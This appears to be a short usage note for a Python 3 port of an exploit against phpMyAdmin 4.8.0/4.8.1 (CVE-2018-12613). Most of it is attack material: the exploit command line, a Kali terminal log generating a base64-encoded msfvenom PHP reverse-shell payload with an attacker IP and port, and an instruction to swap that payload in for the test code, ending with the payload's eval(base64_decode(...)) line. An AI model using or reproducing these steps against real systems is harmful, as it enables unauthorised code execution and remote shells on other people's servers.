Modified standalone exploit ported to Python 3. Tested on Python 3.7.3, phpMyAdmin 4.8.1 running on Ubuntu 16.04 Works on Linux only. Original exploit by SSD. All credits to them.

1. Added function to exit if provided phpMyAdmin username/password is correct
2. Added function to check if version is vulnerable (4.8.0 or 4.8.1)
3. Converted variables to either bytes or strings strictly; Python 3 disallows mixing. See this.

python3 CVE-2018-12613.py -u phpMyAdmin -p password -U http:///[url-phpMyAdmin] –P ”phpcredits();”

Results of php code stored in results.html

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# msfvenom --platform php -a php -e php/base64 -p php/reverse_php LHOST=192.168.92.134 LPORT=4444 -o payload.php
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4045 (iteration=0)
php/base64 chosen with final size 4045
Payload size: 4045 bytes
Saved as: payload.php

Use the msfvenom php payload in place of phpcredits(); above

root@Kali:~/Ruby No MSF/phpmyadmin4.8.1# cat payload.php

eval(base64_decode(ICAg...gfQo));